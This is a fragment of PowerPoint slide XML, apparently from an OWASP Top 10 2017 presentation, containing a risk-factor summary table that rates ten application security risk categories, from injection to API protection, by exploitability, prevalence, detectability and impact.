              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="5486400" y="1268420"/>
                <a:ext cx="436728" cy="1"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="3"/>
                <a:endCxn id="50" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2286000" y="1266037"/>
                <a:ext cx="575647" cy="2384"/>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50" name="Rectangle 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note About Risks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>+R</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Right Arrow 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2795683" y="6512440"/>
            <a:ext cx="209108" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="00000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able 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1150009488"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="1295400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="343850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Top 10 Risk Factor Summary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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tr>
              <a:tr h="9515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The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> statistics and the experience of the OWASP Top 10 team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Even egregious software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFil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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Details About Risk Factors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1470512991"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2438400"/>
          <a:ext cx="6857999" cy="4066502"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="990600"/>
                <a:gridCol w="753602"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1137523"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="791210"/>
              </a:tblGrid>
              <a:tr h="881612">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0"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endParaRPr lang="en-US" sz="1000" b="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endParaRPr lang="en-US" sz="1000" b="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b="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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" b="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endParaRPr lang="en-US"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r>
              <a:tr h="318489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A1-Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMON</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AVERAGE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SEVERE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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A2-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Authentication</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMON</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AVERAGE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SEVERE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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A3-XSS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>VERY WIDESPREAD</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FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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MODERATE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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A4-Access Ctrl</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>WIDESPREAD</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>-Misconfig</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMON</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EASY</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A6-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Sens.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DIFFICULT</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>UNCOMMON</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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SEVERE</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A7-Attack Prot.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMON</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AVERAGE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MODERATE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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A8-CSRF</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>UNCOMMON</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A9-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Components</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMON</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AVERAGE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MODERATE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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A10-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API Prot.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>COMMON</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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>DIFFICULT</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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806751246"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
